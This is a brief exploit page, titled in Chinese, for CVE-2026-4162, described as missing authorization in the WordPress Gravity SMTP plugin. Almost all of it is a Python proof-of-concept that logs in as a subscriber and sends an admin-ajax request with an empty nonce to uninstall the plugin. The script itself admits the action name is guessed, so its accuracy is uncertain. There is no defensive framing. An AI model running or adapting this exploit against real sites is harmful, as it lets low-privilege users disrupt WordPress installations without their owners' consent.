CVE-2026-4162 WordPress Gravity SMTP权限绕过漏洞

import requests # Exploit Title: WordPress Gravity SMTP < 2.1.5 - Missing Authorization (Subscriber to Uninstall) # Description: Exploits the missing authorization check to uninstall the plugin. target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker credentials (Subscriber) username = "subscriber" password = "password" session = requests.Session() # Step 1: Authenticate as a subscriber login_payload = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': 'http://example.com/wp-admin/' } session.post("http://example.com/wp-login.php", data=login_payload) # Step 2: Send exploit payload # The specific action parameter depends on the plugin's actual implementation. # Based on the vuln description, we target the uninstall action. exploit_payload = { 'action': 'gravity_smtp_uninstall_plugin', 'nonce': '' # No nonce required due to vulnerability } response = session.post(target_url, data=exploit_payload) if response.status_code == 200: print("[+] Exploit sent successfully. Plugin should be uninstalled.") else: print("[-] Exploit failed.")